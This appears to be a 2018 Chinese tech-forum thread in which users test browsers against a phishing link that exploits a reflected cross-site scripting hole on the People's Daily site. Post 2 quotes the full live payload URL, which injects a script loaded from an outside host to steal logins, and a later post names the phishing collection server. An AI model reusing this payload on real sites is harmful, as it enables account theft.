1
dingyi9257 2018-06-18 15:30:54 +08:00 via Android 1
谷歌大法好
|
2
xmdhs 2018-06-18 15:31:37 +08:00 via iPad
http://tvplayer.people.com.cn/getXMLForHW.php?stgcfhee=srhgctihedesdfbjmvch&more=use_push_mode&path=as.xml&callback=%3Cbr%3E%00%00%00%00%00%00%00%3CscripT%20/src%3D//api61.oss-cn-beijing.aliyuncs.com/login.js?v=0613%3E%3C/scripT%3E%3C!--&tgaadjcxsi=lbsduqrkbhograhibpda.html/ZlSXL.jpg?tt=0&t=share&time=1529126529879#/hua_reds
好会玩 用人民网 自然就绕过去了 再加上国内的浏览器默认显示标题而不是网址 一般的用户 号就被盗了..... |
3
gam2046 2018-06-18 15:49:20 +08:00
|
4
jininij 2018-06-18 15:58:05 +08:00 via iPhone
chrome 67.0.3396.87 + iOS 11.4 没有任何错误和警告。正常显示。
|
6
Vegetables 2018-06-18 16:18:12 +08:00 via Android
Android chrome 67.0.3396.87 拦截
|
7
zpf020610 2018-06-18 16:19:00 +08:00 via Android
腾讯啪啪打脸
|
8
Vegetables 2018-06-18 16:21:15 +08:00 via Android
顺带问下 MIUI 不能自己更新 webview ? 从 apkpure 下载的无法安装,开发者模式显示的还是 Android system webview 62
|
9
jimages 2018-06-18 16:22:35 +08:00
safari 拦截失败
|
10
jiujiuKA 2018-06-18 16:25:22 +08:00 via Android
安卓 chrome 拦截,ff 放行
|
11
serical 2018-06-18 16:30:26 +08:00 via Android
安卓 yandex 拦截
|
12
chinasunyingjian 2018-06-18 16:33:19 +08:00 via Android 1
@Vegetables 装个框架 用 google play 可以更新
|
13
acsami 2018-06-18 16:44:06 +08:00
谷歌大法好
|
14
we2ex 2018-06-18 18:18:10 +08:00 via Android 1
手机夸克浏览器放行→_→
|
15
willychester 2018-06-18 18:23:50 +08:00
Cent Browser 拦截成功
|
16
woodrat 2018-06-18 18:46:36 +08:00
客户端拦截和云拦截还是不太一样的, 有些 XSS 不好在服务端检测的,客户端检测不到可能是套壳的版本不够高。。
|
17
iyaozhen 2018-06-18 19:23:12 +08:00 via Android
可怕的是微信里面不拦截
|
18
LimboRunner 2018-06-18 19:24:41 +08:00 via Android 1
国际版最新 MIUI 浏览器不拦截,小米垃圾
|
19
mrcn 2018-06-18 19:38:06 +08:00 via Android
WebView 64 拦截成功
|
20
iwtbauh 2018-06-18 19:38:13 +08:00 via Android
lineageos 14.1 自带浏览器(其实就是 webview )成功拦截,显示 net::ERR_BLOCKED_BY_XSS_AUDITOR
chrome for amdroid 67.0 成功拦截 Firefox for android 60.0.2 未拦截 |
21
lp10 2018-06-18 20:12:04 +08:00
Safari 12.0 最终跳转到了王者 x 耀的官网,奇怪……
|
22
alvin666 2018-06-18 20:30:44 +08:00 via Android
@Vegetables googleplay 更新,确实这是个漏洞,MIUI 官方没有更新的,play 上面更新的还可频繁
|
23
Vegetables 2018-06-18 20:49:01 +08:00 via Android
@alvin666 我去试了下微信自带的版本还是 57 呢...ㄟ( ▔, ▔ )ㄏ
|
24
touxigua 2018-06-18 20:53:27 +08:00
点进去之后怎样盗号啊 也有别人给我发这个。。。
|
25
vefawn1 2018-06-18 22:11:10 +08:00 via Android
安卓
uc 浏览器(国际版) 成功放行。 via 浏览器 点击链接后一片空白 |
26
wuhau 2018-06-18 22:12:45 +08:00
这是一个钓鱼页面。 最后将包 POST 到 http[:]//www[dot]vipaag[dot]cn/ save.php
http[:]//www[.]vipaag[.]cn/admin/login[.]php view-source:http://www.vipaag[.]cn/admin/set[.]php?mod=site |
28
Kazetachinu 2018-06-18 23:26:46 +08:00 via iPhone
@xmdhs 手机 QQ 浏览器拦截
|
31
kuleyu 2018-06-18 23:49:15 +08:00 via Android
@xmdhs 我居然才发现人民网的网址是 people.com.cn ,而不是 people.com 或者 people.cn 。
people.com 是一个外国网站,people.cn 会自动跳转到 people.com.cn 。 |
32
freewind 2018-06-19 08:51:31 +08:00
打开后是 http://pvp.qq.com/ ,这个也能钓鱼?
|
33
DOLLOR 2018-06-19 08:53:54 +08:00
该网页无法正常运作
Opera detected unusual code on this page and blocked it to protect your personal information (for example, passwords, phone numbers, and credit cards). |
34
KgM4gLtF0shViDH3 2018-06-19 09:16:33 +08:00
|
35
okampfer 2018-06-19 09:18:10 +08:00
是不是因为你的 Chrome 打开了 Protect you and your device from dangerous sites 这个选项?
|
36
okampfer 2018-06-19 09:18:45 +08:00
Sorry, 刚测试过了,不打开那个选项依然可以拦截。
|
37
zpf124 2018-06-19 09:37:26 +08:00
已经让你们玩坏了,短链被腾讯封了
|
38
qcloud 2018-06-19 12:58:30 +08:00 via iPhone
腾讯已拦截
|
39
cncqw 2018-06-19 15:24:13 +08:00
qq 浏览器是什么情况
|